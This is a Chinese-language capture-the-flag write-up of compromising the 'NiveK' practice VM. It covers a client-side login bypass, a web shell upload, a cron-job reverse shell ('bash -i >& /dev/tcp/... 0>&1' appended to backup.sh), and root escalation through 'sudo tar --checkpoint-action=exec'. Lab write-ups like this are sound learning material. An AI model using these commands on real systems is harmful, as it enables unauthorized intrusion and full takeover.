NiveK 靶场渗透记录

NiveK 靶场渗透记录

一、日常扫ip

image-20230116152522405

靶机IP:192.168.44.129

kali:192.168.44.128

二、日常扫端口

image-20230116153102469

开放端口:21 ftp / 22 ssh / 7080 http,可以看到ftp给了登录名 Anonymous 但是没有密码,姑且尝试一下。

三、21ftp查看

image-20230116153312732

密码为空,登录是登录成功了,但是毛都没有…

四、7080查看

image-20230116153406044

是个医院登录页面,用户名和密码都没有,先用sqlmap尝试一下吧

image-20230116153700014

失败…先扫目录吧

五、日常扫目录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ybIoc6nx-1673857389520)(C:\Users\ivers\AppData\Roaming\Typora\typora-user-images\image-20230116154128161.png)]

貌似也没有什么有用的信息… 卡住了 , 我靠…

看看页面源码吧~~

image-20230116154254588

乱输入尝试了下,发现有前端验证,是不是前端挡住了,没去后台,所有找不到注入点.

果断F12 查看一下

image-20230116154414178

果然是这里有验证,删掉,再试一下~

image-20230116154457407

我靠~~~~牛逼!

image-20230116154514682

主页看到了,查找看看有没有文件上传点.

找了半天,可惜没有. 但是源码中发现了线索。

image-20230116154614677

这里注释了一个页面,试了一下,有这个页面,还藏了上传点~~~

image-20230116154711761

六、挂马反弹shell

image-20230116154852600

F12查看一波,上传地址,kali nc 监听一波就搞定了~~~~走起!

image-20230116155003834

image-20230116155018065

七、提权

image-20230116155122290

先换个shell

python -c "import pty;pty.spawn('/bin/bash')"

查看一波用户:daemon

sudo -l 查看一下

image-20230116155228574

需要密码,看来不行,再尝试一下找一下sudo权限可执行文件吧。

image-20230116155348650

发现bin/bash,果断执行一下

image-20230116155420718

貌似没什么变化,shell前名变了~~~ = 。= |||

文件里搜罗一下吧。

image-20230116155516821

niveK 的home目录下,发现local.txt, cat 发现第一个flag

eren用户的目录无法查看,提示权限不足。看来先要想办法切成eren用户

找了半天,卡主~~攻略了下,我靠,原来前面的/bin/bash 没有加 -p ,所以权限没有提升~

image-20230116155702644

这他喵…(这里的-p其实还是没弄懂)

算了,进去目录看吧~~~~

image-20230116160346295

/etc/下看到好多定时任务,home目录下返现backup.sh可执行文件

image-20230116160606905

查看了定时任务文件crontab,发现很多定时任务,其中就有backup.sh,5分钟执行一次,可以拿那个文件再反弹个高权限shell过来。

image-20230116160921875

刚好,这个文件eren 可读可写,echo了反弹shell 的命令进去,kali 开启nc,等待就好…

echo 'bash -i >& /dev/tcp/192.168.44.128/4444 0>&1' >> backup.sh

image-20230116161013821

感觉等了一年~~我靠!

image-20230116161938459

image-20230116162027908

拿到eren的shell,sudo -l 查看,发现tar命令 ,查一下提权方法!

image-20230116162117808

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

image-20230116162151108

root账户到手,提权成功!

渗透结束!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值